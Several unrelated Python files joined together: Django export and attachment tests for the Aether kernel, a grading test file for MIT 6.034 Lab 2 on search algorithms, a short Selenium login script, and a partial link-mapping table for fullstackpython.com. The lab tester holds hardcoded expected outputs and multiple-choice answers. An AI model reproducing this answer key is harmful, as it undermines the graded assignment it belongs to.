'header_content': 'labels and paths', # not valid, switch to "labels"
'header_separator': '', # not valid, switch to "/"
'header_shorten': 'maybe yes', # not valid, switch to "no"
'data_format': 'flattening', # not valid, switch to "split"
}),
content_type='application/json',
)
self.assertEqual(response.status_code, 200)
task_id = response.json()['task']
task = models.ExportTask.objects.get(pk=task_id)
self.assertEqual(task.settings['offset'], 10)
self.assertEqual(task.settings['limit'], 14) # there was already one submission
self.assertEqual(task.settings['records']['file_format'], 'csv')
self.assertEqual(task.settings['records']['filename'], 'submissions')
self.assertEqual(task.settings['records']['paths'], ['_id', '_rev'])
self.assertEqual(task.settings['records']['labels'], {'_id': 'id', '_rev': 'rev'})
self.assertEqual(
task.settings['records']['export_options'],
{
'header_content': 'labels',
'header_separator': '/',
'header_shorten': 'no',
'data_format': 'split',
})
@mock.patch(
'aether.kernel.api.exporter.__generate_csv_files',
side_effect=OSError('[Errno 2] No such file or directory'),
)
def test__csv__error_2(self, *args):
response = self.client.post(
reverse('submission-csv'),
data=json.dumps({
'header_content': 'paths',
'header_separator': ':',
'header_shorten': 'yes',
'data_format': 'flatten',
'csv_separator': 'TAB', # will be replaced with `\t`
}),
content_type='application/json',
)
self.assertEqual(response.status_code, 200)
task_id = response.json()['task']
task = models.ExportTask.objects.get(pk=task_id)
self.assertEqual(task.created_by.username, 'test')
self.assertEqual(task.project.name, 'project_1')
self.assertEqual(task.status_records, 'ERROR')
self.assertEqual(task.files.count(), 0)
settings = task.settings
self.assertEqual(settings['offset'], 0)
self.assertEqual(settings['limit'], 1)
self.assertEqual(settings['records']['file_format'], 'csv')
self.assertEqual(settings['records']['filename'], 'project_1-export')
self.assertEqual(
settings['records']['export_options'],
{
'header_content': 'paths',
'header_separator': ':',
'header_shorten': 'yes',
'data_format': 'flatten',
})
# -----------------------------
# ATTACHMENTS
# -----------------------------
def test__attachments__exclude(self):
submission = models.Submission.objects.first()
models.Attachment.objects.create(
submission=submission,
attachment_file=SimpleUploadedFile('submission.xml', b'a'),
)
models.Attachment.objects.create(
submission=submission,
attachment_file=SimpleUploadedFile('audit.csv', b'b'),
)
models.Attachment.objects.create(
submission=submission,
attachment_file=SimpleUploadedFile('c.txt', b'c'),
)
self.assertEqual(models.Attachment.objects.count(), 3)
response = self.client.post(
reverse('submission-csv') +
'?generate_attachments=t&exclude_files=(audit\\.csv|\\.xml)$'
)
self.assertEqual(response.status_code, 200)
self.assertEqual(models.ExportTask.objects.count(), 1)
task = models.ExportTask.objects.first()
self.assertEqual(task.status_attachments, 'DONE', task.error_attachments)
self.assertEqual(task.files.count(), 1)
# check attachments
attachments_file = task.files.first()
with tempfile.NamedTemporaryFile() as fa:
with open(fa.name, 'wb') as fpa:
fpa.write(attachments_file.get_content().getvalue())
_attach_files = zipfile.ZipFile(fa).namelist()
self.assertEqual(len(_attach_files), 2, _attach_files)
self.assertIn(f'{submission.pk}/', _attach_files)
self.assertIn(f'{submission.pk}/c.txt', _attach_files)
def test__attachments__exclude__all(self):
submission = models.Submission.objects.first()
models.Attachment.objects.create(
submission=submission,
attachment_file=SimpleUploadedFile('submission.xml', b'a'),
)
models.Attachment.objects.create(
submission=submission,
attachment_file=SimpleUploadedFile('audit.csv', b'b'),
)
self.assertEqual(models.Attachment.objects.count(), 2)
response = self.client.post(
reverse('submission-xlsx') +
'?generate_attachments=t&exclude_files=(audit\\.csv$|\\.xml$)'
)
self.assertEqual(response.status_code, 200)
self.assertEqual(models.ExportTask.objects.count(), 1)
task = models.ExportTask.objects.first()
self.assertEqual(task.status_attachments, 'ERROR', task.error_attachments)
self.assertEqual(task.error_attachments, 'No attachments found!')
self.assertEqual(task.files.count(), 0)
def test__attachments__empty(self):
models.Attachment.objects.all().delete()
response = self.client.post(reverse('submission-csv') + '?generate_attachments=t')
self.assertEqual(response.status_code, 204)
self.assertEqual(models.ExportTask.objects.count(), 0)
def test__attachments__ok(self):
submission = models.Submission.objects.first()
models.Attachment.objects.create(
submission=submission,
attachment_file=SimpleUploadedFile('a.txt', b'a123'),
)
entity_1 = submission.entities.first()
# new submission with 2 attachments
submission.pk = None
submission.payload = dict(self.EXAMPLE_PAYLOAD)
submission.save()
self.assertEqual(models.Submission.objects.count(), 2)
models.Attachment.objects.create(
submission=submission,
attachment_file=SimpleUploadedFile('b.txt', b'b123'),
)
models.Attachment.objects.create(
submission=submission,
attachment_file=SimpleUploadedFile('c.txt', b'c123'),
)
self.assertEqual(models.Attachment.objects.count(), 3)
run_extraction(submission)
self.assertEqual(models.Entity.objects.count(), 2)
entity_2 = submission.entities.first()
# new submission without attachments
submission.pk = None
submission.payload = dict(self.EXAMPLE_PAYLOAD)
submission.save()
self.assertEqual(models.Submission.objects.count(), 3)
run_extraction(submission)
self.assertEqual(models.Entity.objects.count(), 3)
response = self.client.post(
reverse('entity-csv') + '?generate_records=t&generate_attachments=t'
)
self.assertEqual(response.status_code, 200)
self.assertEqual(models.ExportTask.objects.count(), 1)
task = models.ExportTask.objects.first()
self.assertEqual(task.created_by.username, 'test')
self.assertEqual(task.name, 'project_1-export')
self.assertEqual(task.project.name, 'project_1')
self.assertEqual(task.status_records, 'DONE', task.error_records)
self.assertIsNone(task.error_records)
self.assertEqual(task.status_attachments, 'DONE', task.error_attachments)
self.assertIsNone(task.error_attachments)
self.assertEqual(task.files.count(), 2)
self.assertIsNone(task.revision)
# export file
export_file = task.files.first()
self.assertIn('project_1-export-', export_file.name)
self.assertIsNone(export_file.revision)
with tempfile.NamedTemporaryFile() as fe:
with open(fe.name, 'wb') as fpe:
fpe.write(export_file.get_content().getvalue())
_csv_files = zipfile.ZipFile(fe).namelist()
self.assertEqual(len(_csv_files), 4, _csv_files)
self.assertIn('project_1-export.csv', _csv_files)
self.assertIn('project_1-export.1.csv', _csv_files)
self.assertIn('project_1-export.2.csv', _csv_files)
self.assertIn('project_1-export.3.csv', _csv_files)
# attachments
attachments_file = task.files.last()
self.assertIn('project_1-export-attachments-', attachments_file.name)
self.assertIsNone(attachments_file.revision)
with tempfile.NamedTemporaryFile() as fa:
with open(fa.name, 'wb') as fpa:
fpa.write(attachments_file.get_content().getvalue())
_attach_files = zipfile.ZipFile(fa).namelist()
self.assertEqual(len(_attach_files), 5, _attach_files)
self.assertIn(f'{entity_1.pk}/', _attach_files)
self.assertIn(f'{entity_1.pk}/a.txt', _attach_files)
self.assertIn(f'{entity_2.pk}/', _attach_files)
self.assertIn(f'{entity_2.pk}/b.txt', _attach_files)
self.assertIn(f'{entity_2.pk}/c.txt', _attach_files)
def test__attachments__deleted_task(self):
def my_side_effect(task_id):
# let's remove the task and execute the real method
models.ExportTask.objects.filter(pk=task_id).delete()
execute_attachments_task(task_id)
models.Attachment.objects.create(
submission=models.Submission.objects.first(),
attachment_file=SimpleUploadedFile('a.txt', b'123'),
)
with mock.patch(
'aether.kernel.api.exporter.execute_attachments_task',
side_effect=my_side_effect,
):
response = self.client.post(reverse('submission-csv') + '?generate_attachments=t')
self.assertEqual(response.status_code, 200)
self.assertEqual(models.ExportTask.objects.count(), 0)
@override_settings(EXPORT_NUM_CHUNKS=1) # creates 3 processes
def test__attachments__error(self, *args):
def my_side_effect(*args, **kwargs):
if not kwargs['url'].endswith('/b.txt'):
safe_sleep() # wait a little bit
return requests.request(*args, **kwargs) # real method
else:
# there is going to be an unexpected error while fetching file "b.txt"
raise RuntimeError('Being evil')
models.Attachment.objects.create(
submission=models.Submission.objects.first(),
attachment_file=SimpleUploadedFile('a.txt', b'123'),
)
models.Attachment.objects.create(
submission=models.Submission.objects.first(),
attachment_file=SimpleUploadedFile('b.txt', b'123'),
)
models.Attachment.objects.create(
submission=models.Submission.objects.first(),
attachment_file=SimpleUploadedFile('c.txt', b'123'),
)
with mock.patch('aether.sdk.utils.request',
side_effect=my_side_effect):
response = self.client.post(reverse('submission-csv') + '?generate_attachments=t')
self.assertEqual(response.status_code, 200)
task_id = response.json()['task']
task = models.ExportTask.objects.get(pk=task_id)
self.assertEqual(task.created_by.username, 'test')
self.assertEqual(task.name, 'project_1-export')
self.assertEqual(task.project.name, 'project_1')
self.assertIsNone(task.status_records)
self.assertIsNone(task.error_records)
self.assertEqual(task.status_attachments, 'ERROR')
self.assertEqual(task.error_attachments, 'Being evil')
self.assertEqual(task.files.count(), 0)
self.assertIsNone(task.revision)
@mock.patch(
'shutil.make_archive',
side_effect=RuntimeError('Zip too big!!!'),
)
def test__attachments__error__zipping(self, mock_req):
models.Attachment.objects.create(
submission=models.Submission.objects.first(),
attachment_file=SimpleUploadedFile('a.txt', b'123'),
)
response = self.client.post(reverse('submission-csv') + '?generate_attachments=t')
self.assertEqual(response.status_code, 200)
task_id = response.json()['task']
task = models.ExportTask.objects.get(pk=task_id)
self.assertEqual(task.created_by.username, 'test')
self.assertEqual(task.name, 'project_1-export')
self.assertEqual(task.project.name, 'project_1')
self.assertIsNone(task.status_records)
self.assertIsNone(task.error_records)
self.assertEqual(task.status_attachments, 'ERROR')
self.assertEqual(task.error_attachments, 'Zip too big!!!')
self.assertEqual(task.files.count(), 0)
self.assertIsNone(task.revision)
|
# MIT 6.034 Lab 2: Search
from tester import make_test, get_tests
from lab2 import (generic_dfs, generic_bfs, generic_hill_climbing,
generic_best_first, generic_beam, generic_branch_and_bound,
generic_branch_and_bound_with_heuristic,
generic_branch_and_bound_with_extended_set, generic_a_star,
is_admissible, is_consistent, a_star,
TEST_GENERIC_BEAM, TEST_HEURISTICS)
from read_graphs import get_graphs
all_graphs = get_graphs()
GRAPH_0 = all_graphs['GRAPH_0']
GRAPH_1 = all_graphs['GRAPH_1']
GRAPH_2 = all_graphs['GRAPH_2']
GRAPH_3 = all_graphs['GRAPH_3']
GRAPH_FOR_HEURISTICS = all_graphs['GRAPH_FOR_HEURISTICS']
##########################################################################
### OFFLINE TESTS (HARDCODED ANSWERS)
#### PART 1: Helper Functions #########################################
make_test(type = 'FUNCTION', #TEST 1
getargs = [GRAPH_1, ['a', 'c', 'b', 'd']],
testanswer = lambda val, original_val=None: val == 11,
expected_val = 11,
name = 'path_length')
make_test(type = 'FUNCTION', #TEST 2
getargs = [GRAPH_2, ['D', 'C', 'A', 'D', 'E', 'G', 'F']],
testanswer = lambda val, original_val=None: val == 53,
expected_val = 53,
name = 'path_length')
make_test(type = 'FUNCTION', #TEST 3
getargs = [GRAPH_1, ['a']],
testanswer = lambda val, original_val=None: val == 0,
expected_val = 0,
name = 'path_length')
make_test(type = 'FUNCTION', #TEST 4
getargs = [['node1', 'node3', 'node2']],
testanswer = lambda val, original_val=None: val == False,
expected_val = False,
name = 'has_loops')
make_test(type = 'FUNCTION', #TEST 5
getargs = [['d', 'a', 'c', 'a', 'b']],
testanswer = lambda val, original_val=None: val == True,
expected_val = True,
name = 'has_loops')
make_test(type = 'FUNCTION', #TEST 6
getargs = [list('SBCA')],
testanswer = lambda val, original_val=None: val == False,
expected_val = False,
name = 'has_loops')
make_test(type = 'FUNCTION', #TEST 7
getargs = [['X']],
testanswer = lambda val, original_val=None: val == False,
expected_val = False,
name = 'has_loops')
extensions_test1_answer = [['n2', 'n1'], ['n2', 'n3']]
make_test(type = 'FUNCTION', #TEST 8
getargs = [GRAPH_0, ['n2']],
testanswer = lambda val, original_val=None: val == extensions_test1_answer,
expected_val = extensions_test1_answer,
name = 'extensions')
extensions_test2_answer = [['n2', 'n3', 'n4']]
make_test(type = 'FUNCTION', #TEST 9
getargs = [GRAPH_0, ['n2', 'n3']],
testanswer = lambda val, original_val=None: val == extensions_test2_answer,
expected_val = extensions_test2_answer,
name = 'extensions')
extensions_test3_answer = [['S', 'A', 'C', 'E', 'D'],
['S', 'A', 'C', 'E', 'F'],
['S', 'A', 'C', 'E', 'G']]
make_test(type = 'FUNCTION', #TEST 10
getargs = [GRAPH_2, ['S', 'A', 'C', 'E']],
testanswer = lambda val, original_val=None: val == extensions_test3_answer,
expected_val = extensions_test3_answer,
name = 'extensions')
sortby_test1_answer = ['c', 'a', 'b', 'd']
make_test(type = 'FUNCTION', #TEST 11
getargs = [GRAPH_1, 'c', ['d', 'a', 'b', 'c']],
testanswer = lambda val, original_val=None: val == sortby_test1_answer,
expected_val = sortby_test1_answer,
name = 'sort_by_heuristic')
sortby_test2_answer = ['H', 'D', 'F', 'C', 'C', 'A', 'B']
make_test(type = 'FUNCTION', #TEST 12
getargs = [GRAPH_2, 'G', ['D', 'C', 'B', 'H', 'A', 'F', 'C']],
testanswer = lambda val, original_val=None: val == sortby_test2_answer,
expected_val = sortby_test2_answer,
name = 'sort_by_heuristic')
sortby_test3_answer = ['G', 'X', 'Y', 'F']
make_test(type = 'FUNCTION', #TEST 13
getargs = [GRAPH_2, 'G', ['X', 'Y', 'G', 'F']],
testanswer = lambda val, original_val=None: val == sortby_test3_answer,
expected_val = sortby_test3_answer,
name = 'sort_by_heuristic')
#### PART 2: Generic Search #######################################
search_args = {"dfs": generic_dfs,
"bfs": generic_bfs,
"hill_climbing": generic_hill_climbing,
"best_first": generic_best_first,
"beam": generic_beam,
"branch_and_bound": generic_branch_and_bound,
"branch_and_bound_with_heuristic": generic_branch_and_bound_with_heuristic,
"branch_and_bound_with_extended_set": generic_branch_and_bound_with_extended_set,
"a_star": generic_a_star}
# Tests 14-31
search_tests = [['dfs', GRAPH_1, 'a', 'd', 'abcd'],
['dfs', GRAPH_2, 'S', 'G', 'SACDEFG'],
['bfs', GRAPH_1, 'a', 'd', 'abd'],
['bfs', GRAPH_2, 'S', 'G', 'SACEG'],
# ['hill_climbing', GRAPH_1, 'a', 'd', 'abcd'], #depends on lexicographic tie-breaking
['hill_climbing', GRAPH_2, 'S', 'G', 'SADHFG'],
# ['best_first', GRAPH_1, 'a', 'd', 'abcd'], #depends on lexicographic tie-breaking
['best_first', GRAPH_2, 'S', 'G', 'SADEG'],
# ['beam', GRAPH_1, 'a', 'd', 2, 'abd'], #depends on lexicographic tie-breaking
['beam', GRAPH_2, 'S', 'G', 2, 'SBYCEG'],
['beam', GRAPH_2, 'S', 'G', 1, 'SADHFG'],
['beam', GRAPH_2, 'S', 'G', 3, 'SADEG'],
['branch_and_bound', GRAPH_1, 'a', 'd', 'acd'],
['branch_and_bound', GRAPH_2, 'S', 'G', 'SBCEG'],
['branch_and_bound', GRAPH_3, 's', 'g', 'sxwg'],
['branch_and_bound_with_heuristic', GRAPH_1, 'a', 'd', 'acd'],
['branch_and_bound_with_heuristic', GRAPH_2, 'S', 'G', 'SBCEG'],
['branch_and_bound_with_heuristic', GRAPH_3, 's', 'g', 'szwg'],
['branch_and_bound_with_extended_set', GRAPH_1, 'a', 'd', 'acd'],
['branch_and_bound_with_extended_set', GRAPH_2, 'S', 'G', 'SBCEG'],
['branch_and_bound_with_extended_set', GRAPH_3, 's', 'g', 'sxwg'],
['a_star', GRAPH_1, 'a', 'd', 'acd'],
['a_star', GRAPH_2, 'S', 'G', 'SBCEG'],
['a_star', GRAPH_3, 's', 'g', 'sywg']]
def str_to_list(string):
return [char for char in string]
for arg_list in search_tests:
if arg_list[0] != 'beam':
(lambda method, graph, startNode, endNode, answer_string :
make_test(type = 'NESTED_FUNCTION',
getargs = [search_args[method], [graph, startNode, endNode]],
testanswer = (lambda val, original_val=None:
val == str_to_list(answer_string)),
expected_val = str_to_list(answer_string),
name = 'generic_search')
)(*arg_list[:5])
bb_extended_set_tests = [["generic_branch_and_bound", False],
["generic_branch_and_bound_with_heuristic", False],
["generic_branch_and_bound_with_extended_set", True]]
def get_bb_extended_testanswer_fn(answer):
def bb_extended_testanswer(val, original_val=None):
if val == [None, None, None, None]:
raise NotImplementedError
return val[3] == answer
return bb_extended_testanswer
for arg_list in bb_extended_set_tests: #Tests 32-34
(lambda method, answer :
make_test(type = 'VALUE',
getargs = method,
testanswer = get_bb_extended_testanswer_fn(answer),
expected_val = "Correct boolean value indicating whether search uses extended set",
name = method)
)(*arg_list)
#### PART 3: Search Algorithms #########################################
# no-path-found tests with nonexistent goal node: #Tests 35-38
for search_method in ['dfs', 'bfs', 'branch_and_bound',
'branch_and_bound_with_extended_set']:
(lambda method :
make_test(type = 'FUNCTION',
getargs = [GRAPH_1, 'a', 'z'],
testanswer = (lambda val, original_val=None: val == None),
expected_val = None,
name = method)
)(search_method)
# no-path-found test for beam:
make_test(type = 'FUNCTION', #TEST 39
getargs = [GRAPH_2, 'C', 'G', 1],
testanswer = (lambda val, original_val=None: val == None),
expected_val = None,
name = 'beam')
# Tests 40-60
for arg_list in search_tests:
if arg_list[0] == 'beam':
(lambda method, graph, startNode, endNode, beam_width, answer_string :
make_test(type = 'FUNCTION',
getargs = [graph, startNode, endNode, beam_width],
testanswer = (lambda val, original_val=None:
val == str_to_list(answer_string)),
expected_val = str_to_list(answer_string),
name = method)
)(*arg_list[:6])
else:
(lambda method, graph, startNode, endNode, answer_string :
make_test(type = 'FUNCTION',
getargs = [graph, startNode, endNode],
testanswer = (lambda val, original_val=None:
val == str_to_list(answer_string)),
expected_val = str_to_list(answer_string),
name = method)
)(*arg_list[:5])
#### PART 4: Heuristics ###################################################
make_test(type = 'FUNCTION', #TEST 61
getargs = [GRAPH_1, 'd'],
testanswer = lambda val, original_val=None: val == True,
expected_val = True,
name = 'is_admissible')
make_test(type = 'FUNCTION', #TEST 62
getargs = [GRAPH_1, 'c'],
testanswer = lambda val, original_val=None: val == True,
expected_val = True,
name = 'is_admissible')
make_test(type = 'FUNCTION', #TEST 63
getargs = [GRAPH_2, 'G'],
testanswer = lambda val, original_val=None: val == True,
expected_val = True,
name = 'is_admissible')
make_test(type = 'FUNCTION', #TEST 64
getargs = [GRAPH_3, 'g'],
testanswer = lambda val, original_val=None: val == False,
expected_val = False,
name = 'is_admissible')
make_test(type = 'FUNCTION', #TEST 65
getargs = [GRAPH_1, 'd'],
testanswer = lambda val, original_val=None: val == True,
expected_val = True,
name = 'is_consistent')
make_test(type = 'FUNCTION', #TEST 66
getargs = [GRAPH_1, 'c'],
testanswer = lambda val, original_val=None: val == True,
expected_val = True,
name = 'is_consistent')
make_test(type = 'FUNCTION', #TEST 67
getargs = [GRAPH_2, 'G'],
testanswer = lambda val, original_val=None: val == False,
expected_val = False,
name = 'is_consistent')
make_test(type = 'FUNCTION', #TEST 68
getargs = [GRAPH_3, 'g'],
testanswer = lambda val, original_val=None: val == False,
expected_val = False,
name = 'is_consistent')
#### PART 5: Multiple Choice ###################################################
ANSWER_1_getargs = "ANSWER_1"
def ANSWER_1_testanswer(val, original_val = None): #TEST 69
if val == '':
raise NotImplementedError
return str(val) == '2'
make_test(type = 'VALUE',
getargs = ANSWER_1_getargs,
testanswer = ANSWER_1_testanswer,
expected_val = "correct value of ANSWER_1 ('1', '2', '3', or '4')",
name = ANSWER_1_getargs)
ANSWER_2_getargs = "ANSWER_2"
def ANSWER_2_testanswer(val, original_val = None): #TEST 70
if val == '':
raise NotImplementedError
return str(val) == '4'
make_test(type = 'VALUE',
getargs = ANSWER_2_getargs,
testanswer = ANSWER_2_testanswer,
expected_val = "correct value of ANSWER_2 ('1', '2', '3', or '4')",
name = ANSWER_2_getargs)
ANSWER_3_getargs = "ANSWER_3"
def ANSWER_3_testanswer(val, original_val = None): #TEST 71
if val == '':
raise NotImplementedError
return str(val) == '1'
make_test(type = 'VALUE',
getargs = ANSWER_3_getargs,
testanswer = ANSWER_3_testanswer,
expected_val = "correct value of ANSWER_3 ('1', '2', '3', or '4')",
name = ANSWER_3_getargs)
ANSWER_4_getargs = "ANSWER_4"
def ANSWER_4_testanswer(val, original_val = None): #TEST 72
if val == '':
raise NotImplementedError
return str(val) == '3'
make_test(type = 'VALUE',
getargs = ANSWER_4_getargs,
testanswer = ANSWER_4_testanswer,
expected_val = "correct value of ANSWER_4 ('1', '2', '3', or '4')",
name = ANSWER_4_getargs)
#### Optional tests ############################################################
if TEST_GENERIC_BEAM:
for arg_list in search_tests:
if arg_list[0] == 'beam':
(lambda method, graph, startNode, endNode, beam_width, answer_string :
make_test(type = 'NESTED_FUNCTION',
getargs = [search_args[method],
[graph, startNode, endNode, beam_width]],
testanswer = (lambda val, original_val=None:
val == str_to_list(answer_string)),
expected_val = str_to_list(answer_string),
name = 'generic_search')
)(*arg_list[:6])
if TEST_HEURISTICS:
def test_heuristic(heuristic_dict, should_be_admissible, should_be_consistent,
should_be_optimal_a_star):
if None in heuristic_dict['G'].values(): return False
shortest_path = ['S', 'A', 'C', 'G']
GRAPH_FOR_HEURISTICS.set_heuristic(heuristic_dict)
return (should_be_admissible == is_admissible(GRAPH_FOR_HEURISTICS, 'G')
and (should_be_consistent == None
or should_be_consistent == is_consistent(GRAPH_FOR_HEURISTICS, 'G'))
and (should_be_optimal_a_star == None
or (should_be_optimal_a_star == (a_star(GRAPH_FOR_HEURISTICS, 'S', 'G')
== shortest_path))))
make_test(type = 'VALUE',
getargs = 'heuristic_1',
testanswer = (lambda val, original_val=None:
test_heuristic(val, True, True, None)),
expected_val = 'Correct numerical values for heuristic to fit specifications',
name = 'heuristic_1')
make_test(type = 'VALUE',
getargs = 'heuristic_2',
testanswer = (lambda val, original_val=None:
test_heuristic(val, True, False, None)),
expected_val = 'Correct numerical values for heuristic to fit specifications',
name = 'heuristic_2')
make_test(type = 'VALUE',
getargs = 'heuristic_3',
testanswer = (lambda val, original_val=None:
test_heuristic(val, True, None, False)),
expected_val = 'Correct numerical values for heuristic to fit specifications',
name = 'heuristic_3')
make_test(type = 'VALUE',
getargs = 'heuristic_4',
testanswer = (lambda val, original_val=None:
test_heuristic(val, True, False, True)),
expected_val = 'Correct numerical values for heuristic to fit specifications',
name = 'heuristic_4')
|
# os for file management
import selenium
from selenium import webdriver
driver = webdriver.Chrome(r"C:/Program Files (x86)/webdrivers/chromedriver.exe")
driver.get('https://canvas.case.edu')
# Select the id box
id_box = driver.find_element_by_name('username')
# Equivalent Outcome!
id_box = driver.find_element_by_id('username')
id_box.clear()
login_button = driver.find_element_by_name('submit')
login_button.click()
|
import argparse
import os
from os.path import isdir, isfile
BASE_DIR = './tempcontent/pages/'
BASE_FSP = "https://www.fullstackpython.com/"
links = {
"(/table-of-contents.html)":
"(#table-of-contents)",
# chapter 1
"(/introduction.html)":
"(#introduction)",
"(/learning-programming.html)":
"(#learning-programming)",
"(/python-programming-language.html)":
"(#python-programming-language)",
"(/why-use-python.html)":
"(#why-use-python)",
"(/python-2-or-3.html)":
"(#python-2-or-3)",
"(/enterprise-python.html)":
"(#enterprise-python)",
"(/python-community.html)":
"(#python-community)",
"(/companies-using-python.html)":
"(#companies-using-python)",
"(/best-python-resources.html)":
"(#best-python-resources)",
"(/best-python-videos.html)":
"(#best-python-videos)",
"(/best-python-podcasts.html)":
"(#best-python-podcasts)",
# chapter 2
"(/development-environments.html)":
"(#development-environments)",
"(/text-editors-ides.html)":
"(#text-editors-ides)",
"(/vim.html)":
"(#vim)",
"(/emacs.html)":
"(#emacs)",
"(/sublime-text.html)":
"(#sublime-text)",
"(/pycharm.html)":
"(#pycharm)",
"(/jupyter-notebook.html)":
"(#jupyter-notebook)",
"(/shells.html)":
"(#shells)",
"(/bourne-again-shell-bash.html)":
"(#bourne-again-shell-bash)",
"(/zsh-shell.html)":
"(#zsh-shell)",
"(/powershell.html)":
"(#powershell)",
"(/terminal-multiplexers.html)":
"(#terminal-multiplexers)",
"(/tmux.html)":
"(#tmux)",
"(/screen.html)":
"(#screen)",
"(/environment-configuration.html)":
"(#environment-configuration)",
"(/application-dependencies.html)":
"(#application-dependencies)",
"(/virtual-environments-virtualenvs-venvs.html)":
"(#virtual-environments-virtualenvs-venvs)",
"(/localhost-tunnels.html)":
"(#localhost-tunnels)",
"(/source-control.html)":
"(#source-control)",
"(/git.html)":
"(#git)",
"(/mercurial.html)":
"(#mercurial)",
# chapter 3
"(/data.html)":
"(#data)",
"(/databases.html)":
"(#relational-databases)",
"(/postgresql.html)":
"(#postgresql)",
"(/mysql.html)":
"(#mysql)",
"(/sqlite.html)":
"(#sqlite)",
"(/object-relational-mappers-orms.html)":
"(#object-relational-mappers-orms)",
"(/sqlalchemy.html)":
"(#sqlalchemy)",
"(/peewee.html)":
"(#peewee)",
"(/django-orm.html)":
"(#django-orm)",
"(/pony-orm.html)":
"(#pony-orm)",
"(/no-sql-datastore.html)":
"(#no-sql-datastore)",
"(/redis.html)":
"(#redis)",
"(/mongodb.html)":
"(#mongodb)",
"(/apache-cassandra.html)":
"(#apache-cassandra)",
"(/neo4j.html)":
"(#neo4j)",
"(/data-analysis.html)":
"(#data-analysis)",
"(/pandas.html)":
"(#pandas)",
"(/scipy-numpy.html)":
"(#scipy-numpy)",
"(/data-visualization.html)":
"(#data-visualization)",
"(/bokeh.html)":
"(#bokeh)",
"(/d3-js.html)":
"(#d3-js)",
"(/matplotlib.html)":
"(#matplotlib)",
"(/markup-languages.html)":
"(#markup-languages)",
"(/restructuredtext.html)":
"(#restructuredtext)",
"(/markdown.html)":
"(#markdown)",
# chapter 4
"(/web-development.html)":
"(#web-development)",
"(/web-frameworks.html)":
"(#web-frameworks)",
"(/django.html)":
"(#django)",
"(/flask.html)":
"(#flask)",
"(/bottle.html)":
"(#bottle)",
"(/pyramid.html)":
"(#pyramid)",
"(/turbogears.html)":
"(#turbogears)",
"(/falcon.html)":
"(#falcon)",
"(/morepath.html)":
"(#morepath)",
"(/sanic.html)":
"(#sanic)",
"(/other-web-frameworks.html)":
"(#other-web-frameworks)",
"(/template-engines.html)":
"(#template-engines)",
"(/jinja2.html)":
"(#jinja2)",
"(/mako.html)":
"(#mako)",
"(/django-templates.html)":
"(#django-templates)",
"(/web-design.html)":
"(#web-design)",
"(/hypertext-markup-language-html.html)":
"(#hypertext-markup-language-html)",
"(/cascading-style-sheets.html)":
"(#cascading-style-sheets)",
"(/responsive-design.html)":
"(#responsive-design)",
"(/minification.html)":
"(#minification)",
"(/css-frameworks.html)":
"(#css-frameworks)",
"(/bootstrap-css.html)":
"(#bootstrap-css)",
"(/foundation-css.html)":
"(#foundation-css)",
"(/javascript.html)":
"(#javascript)",
"(/react.html)":
"(#react)",
"(/vuejs.html)":
"(#vuejs)",
"(/angular.html)":
"(#angular)",
"(/task-queues.html)":
"(#task-queues)",
"(/celery.html)":
"(#celery)",
"(/redis-queue-rq.html)":
"(#redis-queue-rq)",
"(/dramatiq.html)":
"(#dramatiq)",
"(/static-site-generator.html)":
"(#static-site-generator)",
"(/pelican.html)":
"(#pelican)",
"(/lektor.html)":
"(#lektor)",
"(/mkdocs.html)":
"(#mkdocs)",
"(/testing.html)":
"(#testing)",
"(/unit-testing.html)":
"(#unit-testing)",
"(/integration-testing.html)":
"(#integration-testing)",
"(/debugging.html)":
"(#debugging)",
"(/code-metrics.html)":
"(#code-metrics)",
"(/networking.html)":
"(#networking)",
"(/https.html)":
"(#https)",
"(/websockets.html)":
"(#websockets)",
"(/webrtc.html)":
"(#webrtc)",
"(/application-programming-interfaces.html)":
"(#application-programming-interfaces)",
"(/microservices.html)":
"(#microservices)",
"(/webhooks.html)":
"(#webhooks)",
"(/bots.html)":
"(#bots)",
"(/api-creation.html)":
"(#api-creation)",
"(/api-frameworks.html)":
"(#api-frameworks)",
"(/django-rest-framework-drf.html)":
"(#django-rest-framework-drf)",
"(/api-integration.html)":
"(#api-integration)",
"(/twilio.html)":
"(#twilio)",
"(/stripe.html)":
"(#stripe)",
"(/slack.html)":
"(#slack)",
"(/okta.html)":
"(#okta)",
"(/web-application-security.html)":
"(#web-application-security)",
"(/sql-injection.html)":
"(#sql-injection)",
"(/cross-site-request-forgery-csrf.html)":
"(#cross-site-request-forgery-csrf)",
# chapter 5
"(/deployment.html)":
"(#deployment)",
"(/hosting.html)":
"(#hosting)",
"(/servers.html)":
"(#servers)",
"(/static-content.html)":
"(#static-content)",
"(/content-delivery-networks-cdns.html)":
"(#content-delivery-networks-cdns)",
"(/virtual-private-servers-vps.html)":
"(#virtual-private-servers-vps)",
"(/linode.html)":
"(#linode)",
"(/digitalocean.html)":
"(#digitalocean)",
"(/lightsail.html)":
"(#lightsail)",
"(/platform-as-a-service.html)":
"(#platform-as-a-service)",
"(/heroku.html)":
"(#heroku)",
"(/pythonanywhere.html)":
"(#pythonanywhere)",
"(/aws-codestar.html)":
"(#aws-codestar)",
"(/operating-systems.html)":
"(#operating-systems)",
"(/ubuntu.html)":
"(#ubuntu)",
"(/macos.html)":
"(#macos)",
"(/microsoft-windows.html)":
"(#microsoft-windows)",
"(/freebsd.html)":
"(#freebsd)",
"(/web-servers.html)":
"(#web-servers)",
"(/apache-http-server.html)":
"(#apache-http-server)",
"(/nginx.html)":
"(#nginx)",
"(/caddy.html)":
"(#caddy)",
"(/wsgi-servers.html)":
"(#wsgi-servers)",
"(/green-unicorn-gunicorn.html)":
"(#green-unicorn-gunicorn)",
"(/uwsgi.html)":
"(#uwsgi)",
"(/mod-wsgi.html)":
"(#mod-wsgi)",
"(/continuous-integration.html)":
"(#continuous-integration)",
"(/jenkins.html)":
"(#jenkins)",
"(/gocd.html)":
"(#gocd)",
"(/configuration-management.html)":
"(#configuration-management)",
"(/ansible.html)":
"(#ansible)",
"(/salt.html)":
"(#salt)",
"(/containers.html)":
"(#containers)",
"(/docker.html)":
"(#docker)",
"(/kubernetes.html)":
"(#kubernetes)",
"(/serverless.html)":
"(#serverless)",
"(/aws-lambda.html)":
"(#aws-lambda)",
"(/azure-functions.html)":
"(#azure-functions)",
"(/google-cloud-functions.html)":
"(#google-cloud-functions)",
# chapter 6
"(/devops.html)":
"(#devops)",
"(/monitoring.html)":
"(#monitoring)",
"(/prometheus.html)":
"(#prometheus)",
"(/rollbar.html)":
"(#rollbar)",
"(/sentry.html)":
"(#sentry)",
"(/scout.html)":
"(#scout)",
"(/web-app-performance.html)":
"(#web-app-performance)",
"(/logging.html)":
"(#logging)",
